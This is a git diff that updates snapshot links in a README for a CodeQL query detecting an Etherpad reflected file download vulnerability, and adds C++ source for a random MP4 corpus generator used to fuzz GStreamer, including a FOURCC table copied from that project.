a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md index 96ee549..041dc4b 100644 --- a/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md +++ b/CodeQL_Queries/javascript/Etherpad_CVE-2018-6835/alternative/README.md @@ -1,8 +1,8 @@ This is an alternative presentation of the query from the blog post about -[Detecting Reflected File Download vulnerabilities using QL](https://lgtm.com/blog/etherpad_CVE-2018-6835), +[Detecting Reflected File Download vulnerabilities using QL](https://securitylab.github.com/research/etherpad-reflected-file-download/), phrasing it as a customization of Semmle's standard Reflected XSS query. -Use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2) +Use [this snapshot](https://github.com/github/securitylab/releases/download/etherpad-vulnerable-codeql-database/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2) for the initial stages of the development. All snapshots were built using version 1.9.3 of the Semmle toolchain; if you are using 1.20 or newer you will need to upgrade them. @@ -24,13 +24,13 @@ for the initial stages of the development. 
All snapshots were built using versio
The developers [fixed](https://github.com/ether/etherpad-lite/commit/a2992b3) the vulnerability by introducing a sanitizer using the [is-var-name](https://www.npmjs.com/package/is-var-name) npm package.
-[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_a2992b3.zip) corresponds to the fix commit.
+[This snapshot](https://github.com/github/securitylab/releases/tag/etherpad-patched-codeql-database) corresponds to the fix commit.
The standard library does not include a model for `is-var-name` (it is not a very widely used package), but [07_ReflectedXssWithSanitizer.ql](07_ReflectedXssWithSanitizer.ql) shows that it is very easy to add, making the result go away.
Later on, this sanitizer was [replaced](https://github.com/ether/etherpad-lite/commit/dd7894d) with a custom sanitizer, which is,
-unfortunately, ineffective. ([This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.4.zip)
+unfortunately, ineffective. ([This snapshot](https://github.com/github/securitylab/releases/download/etherpad-1.6.4-patched-codeql-database/Etherpad_1.6.4.zip)
of etherpad-lite v1.6.4 contains the new sanitizer.) However, all browsers mitigate against reflected file download vulnerabilities these days, so while the vulnerability still exists, it is no longer exploitable.
diff --git a/Fuzzing/GStreamer/README.md b/Fuzzing/GStreamer/README.md
new file mode 100644
index 0000000..ee5b827
--- /dev/null
+++ b/Fuzzing/GStreamer/README.md
@@ -0,0 +1,2 @@
+# MP4 corpus generator
+A generator of random MP4 files for use as a fuzzing corpus.
diff --git a/Fuzzing/GStreamer/aux.h b/Fuzzing/GStreamer/aux.h
new file mode 100644
index 0000000..b39c117
--- /dev/null
+++ b/Fuzzing/GStreamer/aux.h
@@ -0,0 +1,61 @@
+#pragma once
+
+#include <cstdint>
+#include <string>
+#include <random>
+#include <fstream>
+#include <filesystem>
+
+// Uniform random integer in [min_value, max_value].
+inline uint32_t rand_uint32(uint32_t min_value, uint32_t max_value) {
+
+    static std::random_device rd;
+    static std::mt19937 gen(rd());
+
+    uint32_t rand_number;
+
+    std::uniform_int_distribution<> dist(min_value, max_value);
+
+    rand_number = dist(gen);
+
+    return rand_number;
+}
+
+
+// Serialize a 32-bit fourcc as 4 bytes, least-significant byte first.
+inline std::string uint32_to_string(uint32_t fourcc){
+
+    std::string output = "";
+
+    output += fourcc & 0xFF;
+    output += (fourcc >> 8) & 0xFF;
+    output += (fourcc >> 16) & 0xFF;
+    output += (fourcc >> 24) & 0xFF;
+
+    return output;
+}
+
+
+// Serialize a 32-bit value as 4 bytes, big-endian (the byte order MP4 box sizes use).
+inline std::string uint32_to_string_BE(uint32_t fourcc){
+
+    std::string output = "";
+
+    output += (fourcc >> 24) & 0xFF;
+    output += (fourcc >> 16) & 0xFF;
+    output += (fourcc >> 8) & 0xFF;
+    output += fourcc & 0xFF;
+
+    return output;
+}
+
+
+// Write `content` to `file` in binary mode; returns false if the file cannot be opened.
+inline bool write_to_file(const std::string &content, std::filesystem::path file){
+
+    std::ofstream ofs(file, std::ios::out | std::ios::binary);
+
+    if (!ofs) {
+        return false;
+    }
+
+    ofs << content;
+
+    ofs.close();
+
+    return true;
+}
\ No newline at end of file
diff --git a/Fuzzing/GStreamer/labeler/MP4.cc b/Fuzzing/GStreamer/labeler/MP4.cc
new file mode 100644
index 0000000..071eb4e
--- /dev/null
+++ b/Fuzzing/GStreamer/labeler/MP4.cc
@@ -0,0 +1,114 @@
+#include <string>
+#include "../aux.h" // assumed path: provides rand_uint32 and the uint32_to_string helpers
+
+#include "MP4.h"
+
+
+std::string MP4_labeler::traverse(Node &node){
+
+    std::string output;
+
+    // Serialize all children first; they become this box's payload.
+    for(int i=0; i < node.children().size(); i++){
+
+        Node &child = tree->get_node(node.children()[i]);
+
+        output += traverse(child);
+    }
+
+    uint32_t size;
+
+    // The root is the fixed 20-byte "ftyp" box (4-byte size field plus its
+    // 16-byte label); every other box is size field + label + children.
+    if(node.get_id() == 0){
+        size = 20;
+    }else{
+        size = node.get_label().size() + output.size() + 4;
+    }
+
+    std::string label = node.get_label();
+
+    // Box layout: 4-byte big-endian size, then the label, then the children.
+    output = uint32_to_string_BE(size) + label + output;
+
+    return output;
+}
+
+
+
+MP4_labeler::MP4_labeler(RandomTree *in_tree) {
+
+    this->tree = in_tree;
+
+    priv_name = "MP4";
+
+    Node &root = this->tree->get_node(0);
+
+    // Root "ftyp" box: major brand "dash" plus two dummy compatible brands.
+    std::string root_label = "ftyp";
+    root_label += "dash";
+    root_label += "AAAABBBB";
+
+    root.set_label(root_label);
+
+    // Label every other node with a random box type from the fourcc tables.
+    for(int i=1; i < this->tree->size(); i++){
+
+        Node &node = this->tree->get_node(i);
+
+        uint32_t fourcc;
+        uint32_t padding;
+        uint32_t random_data;
+
+        if(node.children().size() == 0){
+
+            //LEAF
+            uint32_t random = rand_uint32(0, FOURCC_LIST_SIZE-1);
+
+            fourcc = FOURCC_LIST[random].fourcc;
+            padding = FOURCC_LIST[random].min_size;
+            random_data = rand_uint32(4, 16);
+
+        }else{
+
+            //CONTAINER
+            uint32_t random = rand_uint32(0, CONTAINER_LIST_SIZE-1);
+
+            fourcc = CONTAINER_LIST[random].fourcc;
+            padding = CONTAINER_LIST[random].min_size;
+            random_data = 0;
+
+        }
+
+        // Label = fourcc, then the box's fixed zero padding, then 'A' filler.
+        std::string label = uint32_to_string(fourcc);
+
+        label += std::string(padding, '\x00');
+
+        label += std::string(random_data, '\x41');
+
+        node.set_label(label);
+
+    }
+}
+
+
+
+std::string MP4_labeler::serialize(){
+
+    std::string output;
+
+    Node &root = tree->get_node(0);
+
+    output = traverse(root);
+
+    return output;
+
+}
+
diff --git a/Fuzzing/GStreamer/labeler/MP4.h b/Fuzzing/GStreamer/labeler/MP4.h
new file mode 100644
index 0000000..972a114
--- /dev/null
+++ b/Fuzzing/GStreamer/labeler/MP4.h
@@ -0,0 +1,25 @@
+#pragma once
+
+#include <string>
+#include <cstdint>
+
+#include "random_tree.h" // assumed name for the header declaring RandomTree and Node
+
+#include "fourcc.h"
+#include "labeler.h"
+
+
+class MP4_labeler : public Labeler{
+
+    private:
+
+        RandomTree *tree;
+
+        std::string traverse(Node &node);
+
+    public:
+
+        MP4_labeler(RandomTree *in_tree);
+
+        std::string serialize();
+};
diff --git a/Fuzzing/GStreamer/labeler/fourcc.h b/Fuzzing/GStreamer/labeler/fourcc.h
new file mode 100644
index 0000000..4bd83ad
--- /dev/null
+++ b/Fuzzing/GStreamer/labeler/fourcc.h
@@ -0,0 +1,641 @@
+#pragma once
+
+#include <cstdint>
+
+
+/* FOURCC data copied from GStreamer project (https://gstreamer.freedesktop.org/) */
+
+#define guint32 uint32_t
+
+#define GST_MAKE_FOURCC(a,b,c,d) \
+  ( (guint32)(a) | ((guint32) (b)) << 8 | ((guint32) (c)) << 16 | ((guint32) (d)) << 24 )
+
+#define FOURCC_2vuy GST_MAKE_FOURCC('2','v','u','y')
+#define FOURCC_FMP4 GST_MAKE_FOURCC('F','M','P','4')
+#define FOURCC_H264 GST_MAKE_FOURCC('H','2','6','4')
+#define FOURCC_H265 GST_MAKE_FOURCC('H','2','6','5')
+#define FOURCC_MAC3 GST_MAKE_FOURCC('M','A','C','3')
+#define FOURCC_MAC6 GST_MAKE_FOURCC('M','A','C','6')
+#define FOURCC_MP4V GST_MAKE_FOURCC('M','P','4','V')
+#define FOURCC_PICT GST_MAKE_FOURCC('P','I','C','T')
+#define FOURCC_QDM2 GST_MAKE_FOURCC('Q','D','M','2')
+#define FOURCC_SVQ3 GST_MAKE_FOURCC('S','V','Q','3')
+#define FOURCC_VP31 GST_MAKE_FOURCC('V','P','3','1')
+#define FOURCC_VP80 GST_MAKE_FOURCC('V','P','8','0')
+#define FOURCC_WRLE GST_MAKE_FOURCC('W','R','L','E')
+#define FOURCC_XMP_ GST_MAKE_FOURCC('X','M','P','_')
+#define FOURCC_XVID GST_MAKE_FOURCC('X','V','I','D')
+#define FOURCC__ART GST_MAKE_FOURCC(0xa9,'A','R','T')
+#define FOURCC_____ GST_MAKE_FOURCC('-','-','-','-')
+#define FOURCC___in GST_MAKE_FOURCC(' ',' ','i','n')
+#define FOURCC___ty GST_MAKE_FOURCC(' ',' ','t','y')
+#define FOURCC__alb GST_MAKE_FOURCC(0xa9,'a','l','b')
+#define FOURCC__cpy GST_MAKE_FOURCC(0xa9,'c','p','y')
+#define FOURCC__day GST_MAKE_FOURCC(0xa9,'d','a','y')
+#define FOURCC__des GST_MAKE_FOURCC(0xa9,'d','e','s')
+#define FOURCC__enc GST_MAKE_FOURCC(0xa9,'e','n','c')
+#define FOURCC__gen
GST_MAKE_FOURCC(0xa9, 'g', 'e', 'n') +#define FOURCC__grp GST_MAKE_FOURCC(0xa9,'g','r','p') +#define FOURCC__inf GST_MAKE_FOURCC(0xa9,'i','n','f') +#define FOURCC__lyr GST_MAKE_FOURCC(0xa9,'l','y','r') +#define FOURCC__mp3 GST_MAKE_FOURCC('.','m','p','3') +#define FOURCC__nam GST_MAKE_FOURCC(0xa9,'n','a','m') +#define FOURCC__req GST_MAKE_FOURCC(0xa9,'r','e','q') +#define FOURCC__too GST_MAKE_FOURCC(0xa9,'t','o','o') +#define FOURCC__wrt GST_MAKE_FOURCC(0xa9,'w','r','t') +#define FOURCC_aART GST_MAKE_FOURCC('a','A','R','T') +#define FOURCC_ac_3 GST_MAKE_FOURCC('a','c','-','3') +#define FOURCC_agsm GST_MAKE_FOURCC('a','g','s','m') +#define FOURCC_ai12 GST_MAKE_FOURCC('a','i','1','2') +#define FOURCC_ai13 GST_MAKE_FOURCC('a','i','1','3') +#define FOURCC_ai15 GST_MAKE_FOURCC('a','i','1','5') +#define FOURCC_ai16 GST_MAKE_FOURCC('a','i','1','6') +#define FOURCC_ai1p GST_MAKE_FOURCC('a','i','1','p') +#define FOURCC_ai1q GST_MAKE_FOURCC('a','i','1','q') +#define FOURCC_ai52 GST_MAKE_FOURCC('a','i','5','2') +#define FOURCC_ai53 GST_MAKE_FOURCC('a','i','5','3') +#define FOURCC_ai55 GST_MAKE_FOURCC('a','i','5','5') +#define FOURCC_ai56 GST_MAKE_FOURCC('a','i','5','6') +#define FOURCC_ai5p GST_MAKE_FOURCC('a','i','5','p') +#define FOURCC_ai5q GST_MAKE_FOURCC('a','i','5','q') +#define FOURCC_alac GST_MAKE_FOURCC('a','l','a','c') +#define FOURCC_fLaC GST_MAKE_FOURCC('f','L','a','C') +#define FOURCC_dfLa GST_MAKE_FOURCC('d','f','L','a') +#define FOURCC_alaw GST_MAKE_FOURCC('a','l','a','w') +#define FOURCC_alis GST_MAKE_FOURCC('a','l','i','s') +#define FOURCC_appl GST_MAKE_FOURCC('a','p','p','l') +#define FOURCC_avc1 GST_MAKE_FOURCC('a','v','c','1') +#define FOURCC_avc3 GST_MAKE_FOURCC('a','v','c','3') +#define FOURCC_avcC GST_MAKE_FOURCC('a','v','c','C') +#define FOURCC_c608 GST_MAKE_FOURCC('c','6','0','8') +#define FOURCC_c708 GST_MAKE_FOURCC('c','7','0','8') +#define FOURCC_ccdp GST_MAKE_FOURCC('c','c','d','p') +#define FOURCC_cdat GST_MAKE_FOURCC('c','d','a','t') +#define FOURCC_cdt2 GST_MAKE_FOURCC('c','d','t','2') +#define FOURCC_clcp GST_MAKE_FOURCC('c','l','c','p') +#define FOURCC_clip GST_MAKE_FOURCC('c','l','i','p') +#define FOURCC_cmov GST_MAKE_FOURCC('c','m','o','v') +#define FOURCC_cmvd GST_MAKE_FOURCC('c','m','v','d') +#define FOURCC_co64 GST_MAKE_FOURCC('c','o','6','4') +#define FOURCC_covr GST_MAKE_FOURCC('c','o','v','r') +#define FOURCC_cpil GST_MAKE_FOURCC('c','p','i','l') +#define FOURCC_cprt GST_MAKE_FOURCC('c','p','r','t') +#define FOURCC_crgn GST_MAKE_FOURCC('c','r','g','n') +#define FOURCC_ctab GST_MAKE_FOURCC('c','t','a','b') +#define FOURCC_ctts GST_MAKE_FOURCC('c','t','t','s') +#define FOURCC_cslg GST_MAKE_FOURCC('c','s','l','g') +#define FOURCC_d263 GST_MAKE_FOURCC('d','2','6','3') +#define FOURCC_dac3 GST_MAKE_FOURCC('d','a','c','3') +#define FOURCC_damr GST_MAKE_FOURCC('d','a','m','r') +#define FOURCC_data GST_MAKE_FOURCC('d','a','t','a') +#define FOURCC_dcom GST_MAKE_FOURCC('d','c','o','m') +#define FOURCC_desc GST_MAKE_FOURCC('d','e','s','c') +#define FOURCC_dhlr GST_MAKE_FOURCC('d','h','l','r') +#define FOURCC_dinf GST_MAKE_FOURCC('d','i','n','f') +#define FOURCC_disc GST_MAKE_FOURCC('d','i','s','c') +#define FOURCC_disk GST_MAKE_FOURCC('d','i','s','k') +#define FOURCC_drac GST_MAKE_FOURCC('d','r','a','c') +#define FOURCC_dref GST_MAKE_FOURCC('d','r','e','f') +#define FOURCC_drmi GST_MAKE_FOURCC('d','r','m','i') +#define FOURCC_drms GST_MAKE_FOURCC('d','r','m','s') +#define FOURCC_dvcp GST_MAKE_FOURCC('d','v','c','p') +#define FOURCC_dvc_ GST_MAKE_FOURCC('d','v','c',' ') 
+#define FOURCC_dv5p GST_MAKE_FOURCC('d','v','5','p') +#define FOURCC_dv5n GST_MAKE_FOURCC('d','v','5','n') +#define FOURCC_dva1 GST_MAKE_FOURCC('d','v','a','1') +#define FOURCC_dvav GST_MAKE_FOURCC('d','v','a','v') +#define FOURCC_dvh1 GST_MAKE_FOURCC('d','v','h','1') +#define FOURCC_dvhe GST_MAKE_FOURCC('d','v','h','e') +#define FOURCC_dvcC GST_MAKE_FOURCC('d','v','c','C') +#define FOURCC_edts GST_MAKE_FOURCC('e','d','t','s') +#define FOURCC_elst GST_MAKE_FOURCC('e','l','s','t') +#define FOURCC_enda GST_MAKE_FOURCC('e','n','d','a') +#define FOURCC_esds GST_MAKE_FOURCC('e','s','d','s') +#define FOURCC_fmp4 GST_MAKE_FOURCC('f','m','p','4') +#define FOURCC_free GST_MAKE_FOURCC('f','r','e','e') +#define FOURCC_frma GST_MAKE_FOURCC('f','r','m','a') +#define FOURCC_ftyp GST_MAKE_FOURCC('f','t','y','p') +#define FOURCC_ftab GST_MAKE_FOURCC('f','t','a','b') +#define FOURCC_gama GST_MAKE_FOURCC('g','a','m','a') +#define FOURCC_glbl GST_MAKE_FOURCC('g','l','b','l') +#define FOURCC_gmhd GST_MAKE_FOURCC('g','m','h','d') +#define FOURCC_gmin GST_MAKE_FOURCC('g','m','i','n') +#define FOURCC_gnre GST_MAKE_FOURCC('g','n','r','e') +#define FOURCC_h263 GST_MAKE_FOURCC('h','2','6','3') +#define FOURCC_hdlr GST_MAKE_FOURCC('h','d','l','r') +#define FOURCC_hev1 GST_MAKE_FOURCC('h','e','v','1') +#define FOURCC_hint GST_MAKE_FOURCC('h','i','n','t') +#define FOURCC_hmhd GST_MAKE_FOURCC('h','m','h','d') +#define FOURCC_hndl GST_MAKE_FOURCC('h','n','d','l') +#define FOURCC_hnti GST_MAKE_FOURCC('h','n','t','i') +#define FOURCC_hvc1 GST_MAKE_FOURCC('h','v','c','1') +#define FOURCC_hvcC GST_MAKE_FOURCC('h','v','c','C') +#define FOURCC_ilst GST_MAKE_FOURCC('i','l','s','t') +#define FOURCC_ima4 GST_MAKE_FOURCC('i','m','a','4') +#define FOURCC_imap GST_MAKE_FOURCC('i','m','a','p') +#define FOURCC_s16l GST_MAKE_FOURCC('s','1','6','l') +#define FOURCC_in24 GST_MAKE_FOURCC('i','n','2','4') +#define FOURCC_in32 GST_MAKE_FOURCC('i','n','3','2') +#define FOURCC_fl64 GST_MAKE_FOURCC('f','l','6','4') +#define FOURCC_fl32 GST_MAKE_FOURCC('f','l','3','2') +#define FOURCC_jp2c GST_MAKE_FOURCC('j','p','2','c') +#define FOURCC_jpeg GST_MAKE_FOURCC('j','p','e','g') +#define FOURCC_keyw GST_MAKE_FOURCC('k','e','y','w') +#define FOURCC_kmat GST_MAKE_FOURCC('k','m','a','t') +#define FOURCC_kywd GST_MAKE_FOURCC('k','y','w','d') +#define FOURCC_load GST_MAKE_FOURCC('l','o','a','d') +#define FOURCC_matt GST_MAKE_FOURCC('m','a','t','t') +#define FOURCC_mdat GST_MAKE_FOURCC('m','d','a','t') +#define FOURCC_mdhd GST_MAKE_FOURCC('m','d','h','d') +#define FOURCC_mdia GST_MAKE_FOURCC('m','d','i','a') +#define FOURCC_mdir GST_MAKE_FOURCC('m','d','i','r') +#define FOURCC_mean GST_MAKE_FOURCC('m','e','a','n') +#define FOURCC_meta GST_MAKE_FOURCC('m','e','t','a') +#define FOURCC_mhlr GST_MAKE_FOURCC('m','h','l','r') +#define FOURCC_minf GST_MAKE_FOURCC('m','i','n','f') +#define FOURCC_moov GST_MAKE_FOURCC('m','o','o','v') +#define FOURCC_mp3_ GST_MAKE_FOURCC('m','p','3',' ') +#define FOURCC_mp4a GST_MAKE_FOURCC('m','p','4','a') +#define FOURCC_mp4s GST_MAKE_FOURCC('m','p','4','s') +#define FOURCC_mp4s GST_MAKE_FOURCC('m','p','4','s') +#define FOURCC_mp4v GST_MAKE_FOURCC('m','p','4','v') +#define FOURCC_name GST_MAKE_FOURCC('n','a','m','e') +#define FOURCC_nclc GST_MAKE_FOURCC('n','c','l','c') +#define FOURCC_nclx GST_MAKE_FOURCC('n','c','l','x') +#define FOURCC_nmhd GST_MAKE_FOURCC('n','m','h','d') +#define FOURCC_opus GST_MAKE_FOURCC('O','p','u','s') +#define FOURCC_dops GST_MAKE_FOURCC('d','O','p','s') +#define FOURCC_pasp 
GST_MAKE_FOURCC('p','a','s','p') +#define FOURCC_colr GST_MAKE_FOURCC('c','o','l','r') +#define FOURCC_clap GST_MAKE_FOURCC('c','l','a','p') +#define FOURCC_tapt GST_MAKE_FOURCC('t','a','p','t') +#define FOURCC_clef GST_MAKE_FOURCC('c','l','e','f') +#define FOURCC_prof GST_MAKE_FOURCC('p','r','o','f') +#define FOURCC_enof GST_MAKE_FOURCC('e','n','o','f') +#define FOURCC_fiel GST_MAKE_FOURCC('f','i','e','l') +#define FOURCC_pcst GST_MAKE_FOURCC('p','c','s','t') +#define FOURCC_pgap GST_MAKE_FOURCC('p','g','a','p') +#define FOURCC_png GST_MAKE_FOURCC('p','n','g',' ') +#define FOURCC_pnot GST_MAKE_FOURCC('p','n','o','t') +#define FOURCC_qt__ GST_MAKE_FOURCC('q','t',' ',' ') +#define FOURCC_qtim GST_MAKE_FOURCC('q','t','i','m') +#define FOURCC_raw_ GST_MAKE_FOURCC('r','a','w',' ') +#define FOURCC_rdrf GST_MAKE_FOURCC('r','d','r','f') +#define FOURCC_rle_ GST_MAKE_FOURCC('r','l','e',' ') +#define FOURCC_rmda GST_MAKE_FOURCC('r','m','d','a') +#define FOURCC_rmdr GST_MAKE_FOURCC('r','m','d','r') +#define FOURCC_rmra GST_MAKE_FOURCC('r','m','r','a') +#define FOURCC_rmvc GST_MAKE_FOURCC('r','m','v','c') +#define FOURCC_rtp_ GST_MAKE_FOURCC('r','t','p',' ') +#define FOURCC_rtsp GST_MAKE_FOURCC('r','t','s','p') +#define FOURCC_s263 GST_MAKE_FOURCC('s','2','6','3') +#define FOURCC_samr GST_MAKE_FOURCC('s','a','m','r') +#define FOURCC_sawb GST_MAKE_FOURCC('s','a','w','b') +#define FOURCC_sbtl GST_MAKE_FOURCC('s','b','t','l') +#define FOURCC_sdp_ GST_MAKE_FOURCC('s','d','p',' ') +#define FOURCC_sidx GST_MAKE_FOURCC('s','i','d','x') +#define FOURCC_skip GST_MAKE_FOURCC('s','k','i','p') +#define FOURCC_smhd GST_MAKE_FOURCC('s','m','h','d') +#define FOURCC_soaa GST_MAKE_FOURCC('s','o','a','a') +#define FOURCC_soal GST_MAKE_FOURCC('s','o','a','l') +#define FOURCC_soar GST_MAKE_FOURCC('s','o','a','r') +#define FOURCC_soco GST_MAKE_FOURCC('s','o','c','o') +#define FOURCC_sonm GST_MAKE_FOURCC('s','o','n','m') +#define FOURCC_sosn GST_MAKE_FOURCC('s','o','s','n') +#define FOURCC_soun GST_MAKE_FOURCC('s','o','u','n') +#define FOURCC_sowt GST_MAKE_FOURCC('s','o','w','t') +#define FOURCC_stbl GST_MAKE_FOURCC('s','t','b','l') +#define FOURCC_stco GST_MAKE_FOURCC('s','t','c','o') +#define FOURCC_stpp GST_MAKE_FOURCC('s','t','p','p') +#define FOURCC_stps GST_MAKE_FOURCC('s','t','p','s') +#define FOURCC_strf GST_MAKE_FOURCC('s','t','r','f') +#define FOURCC_strm GST_MAKE_FOURCC('s','t','r','m') +#define FOURCC_stsc GST_MAKE_FOURCC('s','t','s','c') +#define FOURCC_stsd GST_MAKE_FOURCC('s','t','s','d') +#define FOURCC_stss GST_MAKE_FOURCC('s','t','s','s') +#define FOURCC_stsz GST_MAKE_FOURCC('s','t','s','z') +#define FOURCC_stts GST_MAKE_FOURCC('s','t','t','s') +#define FOURCC_styp GST_MAKE_FOURCC('s','t','y','p') +#define FOURCC_subp GST_MAKE_FOURCC('s','u','b','p') +#define FOURCC_subt GST_MAKE_FOURCC('s','u','b','t') +#define FOURCC_text GST_MAKE_FOURCC('t','e','x','t') +#define FOURCC_tcmi GST_MAKE_FOURCC('t','c','m','i') +#define FOURCC_tkhd GST_MAKE_FOURCC('t','k','h','d') +#define FOURCC_tmcd GST_MAKE_FOURCC('t','m','c','d') +#define FOURCC_tmpo GST_MAKE_FOURCC('t','m','p','o') +#define FOURCC_trak GST_MAKE_FOURCC('t','r','a','k') +#define FOURCC_tref GST_MAKE_FOURCC('t','r','e','f') +#define FOURCC_trkn GST_MAKE_FOURCC('t','r','k','n') +#define FOURCC_tven GST_MAKE_FOURCC('t','v','e','n') +#define FOURCC_tves GST_MAKE_FOURCC('t','v','e','s') +#define FOURCC_tvsh GST_MAKE_FOURCC('t','v','s','h') +#define FOURCC_tvsn GST_MAKE_FOURCC('t','v','s','n') +#define FOURCC_twos GST_MAKE_FOURCC('t','w','o','s') +#define 
FOURCC_tx3g GST_MAKE_FOURCC('t','x','3','g') +#define FOURCC_udta GST_MAKE_FOURCC('u','d','t','a') +#define FOURCC_ulaw GST_MAKE_FOURCC('u','l','a','w') +#define FOURCC_url_ GST_MAKE_FOURCC('u','r','l',' ') +#define FOURCC_uuid GST_MAKE_FOURCC('u','u','i','d') +#define FOURCC_v210 GST_MAKE_FOURCC('v','2','1','0') +#define FOURCC_vc_1 GST_MAKE_FOURCC('v','c','-','1') +#define FOURCC_vide GST_MAKE_FOURCC('v','i','d','e') +#define FOURCC_vmhd GST_MAKE_FOURCC('v','m','h','d') +#define FOURCC_vp08 GST_MAKE_FOURCC('v','p','0','8') +#define FOURCC_vp09 GST_MAKE_FOURCC('v','p','0','9') +#define FOURCC_vpcC GST_MAKE_FOURCC('v','p','c','C') +#define FOURCC_xvid GST_MAKE_FOURCC('x','v','i','d') +#define FOURCC_wave GST_MAKE_FOURCC('w','a','v','e') +#define FOURCC_wide GST_MAKE_FOURCC('w','i','d','e') +#define FOURCC_zlib GST_MAKE_FOURCC('z','l','i','b') +#define FOURCC_lpcm GST_MAKE_FOURCC('l','p','c','m') +#define FOURCC_av01 GST_MAKE_FOURCC('a','v','0','1') +#define FOURCC_av1C GST_MAKE_FOURCC('a','v','1','C') +#define FOURCC_av1f GST_MAKE_FOURCC('a','v','1','f') +#define FOURCC_av1m GST_MAKE_FOURCC('a','v','1','m') +#define FOURCC_av1s GST_MAKE_FOURCC('a','v','1','s') +#define FOURCC_av1M GST_MAKE_FOURCC('a','v','1','M') + +#define FOURCC_cfhd GST_MAKE_FOURCC('C','F','H','D') +#define FOURCC_ap4x GST_MAKE_FOURCC('a','p','4','x') +#define FOURCC_ap4h GST_MAKE_FOURCC('a','p','4','h') +#define FOURCC_apch GST_MAKE_FOURCC('a','p','c','h') +#define FOURCC_apcn GST_MAKE_FOURCC('a','p','c','n') +#define FOURCC_apco GST_MAKE_FOURCC('a','p','c','o') +#define FOURCC_apcs GST_MAKE_FOURCC('a','p','c','s') +#define FOURCC_m1v GST_MAKE_FOURCC('m','1','v',' ') +#define FOURCC_vivo GST_MAKE_FOURCC('v','i','v','o') +#define FOURCC_saiz GST_MAKE_FOURCC('s','a','i','z') +#define FOURCC_saio GST_MAKE_FOURCC('s','a','i','o') + +#define FOURCC_3gg6 GST_MAKE_FOURCC('3','g','g','6') +#define FOURCC_3gg7 GST_MAKE_FOURCC('3','g','g','7') +#define FOURCC_3gp4 GST_MAKE_FOURCC('3','g','p','4') +#define FOURCC_3gp6 GST_MAKE_FOURCC('3','g','p','6') +#define FOURCC_3gr6 GST_MAKE_FOURCC('3','g','r','6') +#define FOURCC_3g__ GST_MAKE_FOURCC('3','g',0,0) +#define FOURCC_isml GST_MAKE_FOURCC('i','s','m','l') +#define FOURCC_iso2 GST_MAKE_FOURCC('i','s','o','2') +#define FOURCC_isom GST_MAKE_FOURCC('i','s','o','m') +#define FOURCC_mp41 GST_MAKE_FOURCC('m','p','4','1') +#define FOURCC_mp42 GST_MAKE_FOURCC('m','p','4','2') +#define FOURCC_piff GST_MAKE_FOURCC('p','i','f','f') +#define FOURCC_titl GST_MAKE_FOURCC('t','i','t','l') + +/* SVQ3 fourcc */ +#define FOURCC_SEQH GST_MAKE_FOURCC('S','E','Q','H') +#define FOURCC_SMI_ GST_MAKE_FOURCC('S','M','I',' ') + +/* 3gpp asset meta data fourcc */ +#define FOURCC_albm GST_MAKE_FOURCC('a','l','b','m') +#define FOURCC_auth GST_MAKE_FOURCC('a','u','t','h') +#define FOURCC_clsf GST_MAKE_FOURCC('c','l','s','f') +#define FOURCC_dscp GST_MAKE_FOURCC('d','s','c','p') +#define FOURCC_loci GST_MAKE_FOURCC('l','o','c','i') +#define FOURCC_perf GST_MAKE_FOURCC('p','e','r','f') +#define FOURCC_rtng GST_MAKE_FOURCC('r','t','n','g') +#define FOURCC_yrrc GST_MAKE_FOURCC('y','r','r','c') + +/* misc tag stuff */ +#define FOURCC_ID32 GST_MAKE_FOURCC('I', 'D','3','2') + +/* ISO Motion JPEG 2000 fourcc */ +#define FOURCC_cdef GST_MAKE_FOURCC('c','d','e','f') +#define FOURCC_cmap GST_MAKE_FOURCC('c','m','a','p') +#define FOURCC_ihdr GST_MAKE_FOURCC('i','h','d','r') +#define FOURCC_jp2h GST_MAKE_FOURCC('j','p','2','h') +#define FOURCC_jp2x GST_MAKE_FOURCC('j','p','2','x') +#define FOURCC_mjp2 
GST_MAKE_FOURCC('m','j','p','2')
+
+/* some buggy hardware's notion of mdhd */
+#define FOURCC_mhdr GST_MAKE_FOURCC('m','h','d','r')
+
+/* Fragmented MP4 */
+#define FOURCC_btrt GST_MAKE_FOURCC('b','t','r','t')
+#define FOURCC_mehd GST_MAKE_FOURCC('m','e','h','d')
+#define FOURCC_mfhd GST_MAKE_FOURCC('m','f','h','d')
+#define FOURCC_mfra GST_MAKE_FOURCC('m','f','r','a')
+#define FOURCC_mfro GST_MAKE_FOURCC('m','f','r','o')
+#define FOURCC_moof GST_MAKE_FOURCC('m','o','o','f')
+#define FOURCC_mvex GST_MAKE_FOURCC('m','v','e','x')
+#define FOURCC_mvhd GST_MAKE_FOURCC('m','v','h','d')
+#define FOURCC_ovc1 GST_MAKE_FOURCC('o','v','c','1')
+#define FOURCC_owma GST_MAKE_FOURCC('o','w','m','a')
+#define FOURCC_sdtp GST_MAKE_FOURCC('s','d','t','p')
+#define FOURCC_tfhd GST_MAKE_FOURCC('t','f','h','d')
+#define FOURCC_tfra GST_MAKE_FOURCC('t','f','r','a')
+#define FOURCC_traf GST_MAKE_FOURCC('t','r','a','f')
+#define FOURCC_trex GST_MAKE_FOURCC('t','r','e','x')
+#define FOURCC_trun GST_MAKE_FOURCC('t','r','u','n')
+#define FOURCC_wma_ GST_MAKE_FOURCC('w','m','a',' ')
+
+/* MPEG DASH */
+#define FOURCC_tfdt GST_MAKE_FOURCC('t','f','d','t')
+
+/* Xiph fourcc */
+#define FOURCC_XdxT GST_MAKE_FOURCC('X','d','x','T')
+#define FOURCC_XiTh GST_MAKE_FOURCC('X','i','T','h')
+#define FOURCC_tCtC GST_MAKE_FOURCC('t','C','t','C')
+#define FOURCC_tCtH GST_MAKE_FOURCC('t','C','t','H')
+#define FOURCC_tCt_ GST_MAKE_FOURCC('t','C','t','#')
+
+/* ilst metatags */
+#define FOURCC__cmt GST_MAKE_FOURCC(0xa9, 'c','m','t')
+
+/* apple tags */
+#define FOURCC__mak GST_MAKE_FOURCC(0xa9, 'm','a','k')
+#define FOURCC__mod GST_MAKE_FOURCC(0xa9, 'm','o','d')
+#define FOURCC__swr GST_MAKE_FOURCC(0xa9, 's','w','r')
+
